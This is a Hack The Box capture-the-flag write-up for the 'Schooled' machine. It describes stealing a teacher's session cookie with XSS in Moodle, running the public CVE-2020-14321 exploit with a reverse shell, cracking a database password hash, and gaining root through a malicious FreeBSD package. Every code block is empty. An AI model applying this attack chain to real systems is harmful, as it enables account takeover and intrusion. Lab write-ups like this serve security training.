ūüĒéūü¶∂Enumeration/Foothold

Schooled is an Medium box from HTB and created by TheCyberGeek. This box features a XSS exploit and privilege escalation via moodle and a malicious pkg on FreeBSD for root. I begin each box by running a RustScan. This is bundled into my setup.sh script which I’ve mentioned in a few of my other posts. Running¬†RustScan¬†with¬†NMAP¬†filters shows a website available on¬†Port 80. Reviewing the results I see¬†Port 80¬†open and that its running an HTML based website. This tells me that I should be looking for a subdomain or a different port as in the majority of cases HTML based websites are used for clues and rabbit holes.

Seeing an HTML based website with a contact form on Port 80.

Seeing an HTML based website with a contact form on Port 80.

I head over to the website and I’m presented with a website for an online institute. I notice it states By¬†hml design¬†so I verify its html by going to¬†index.html. I also see¬†schooled.htb. I edit my host file and navigate around the remainder of the site.

Schooled domain referenced as well as HTML based design.

Schooled domain referenced as well as HTML based design.

Copy

Referencing above I also begin running a vhost search utilizing GoBuster. A subdomain for moodle pops after a few seconds. I alter my host file to add moodle and head over to the site.

Copy
Running GoBuster to find an additional vhost.

Running GoBuster to find an additional vhost.

After arriving at the Moodle subdomain I poke around the site. To access the classes requires you to register so I try to register an account. I get an additional subdomain in the error form when registering.

Registration for moodle.schooled.htb

Registration for moodle.schooled.htb

Navigating over to the new subdomain brings me back to the main site. Due to this I continue the registration process subbing my @islanddog.ky domain for @student.schooled.htb. I am able to login and successfully register for the Mathematics class.

Registering for the Mathematics class

Registering for the Mathematics class.

After poking around and trying to use the Private Files and Picture area on the profile area to priv esc I notice the following under announcements:

Reminder for the MoodleNet profile.

Reminder for the MoodleNet profile.

This tells me the teacher is going to be constantly checking my profile for a MoodleNet profile link. This also means she is going to click on the link. I setup an XSS request and an nc listener and wait.

MoodleNet profile xss

MoodleNet profile xss

Copy

I see the cookie come through and use the Cookie Editor plugin for Firefox to take over the session.

The student has become the teacher

The student has become the teacher

I look around the Teachers account for my next priv escalation. After coming up dry I research moodle with Teacher access. Eventually I find¬†GitHub.com – lanzt – CVE2020-14321. After pulling the repo I realize I don’t have pwn which is required for the script. I install pwn using PIP and proceed to run the script.

Copy
Running CVE2020-14321 exploit with a one liner reverse shell

Running CVE2020-14321 exploit with a one liner reverse shell

ūüĒĚEscalation

After establishing a low priv session I navigate around the Moodle install. I looked for the Config.php file as I know Database credentials are stored in this file.

Moodle database credentials found

Moodle database credentials found

Not knowing the FreeBSD platform very well I stumble around till I find the MySQL install. I login to the database using the previously found credentials and extract the mdl_user table.

Copy
admin hash found

admin hash found

I took the hash and ran it through John. Well navigating the environment earlier and figuring out MySQL I noticed that Jamie was also an active user on the box. That alongside SSH being open I used the password found in the hash to log into the box.

john cracking the admin password hash

john cracking the admin password hash

Copy

The first thing I do when entering the box is sudo -l which comes back with some interesting permissions. Googling around I found LastSummer.de РCreatring Custom Packages on FreeBSD and GitHub Рfreebsd/pkg to create a custom .sh script.

ūüďúScript

Copy

I upload the script to Jamie’s¬†SSH¬†environment and then run the script.

‚ö† Attack Machine

Copy

ūüéĮVictim Machine

Copy

I finalized this machine well on the road using my laptop and thus the images/script used are not present. I will hopefully not be lazy and update this in the future!

Rooted

Published On: September 10th, 2021 / Categories: HTB, Technology / Tags: , , , , , , /

Leave A Comment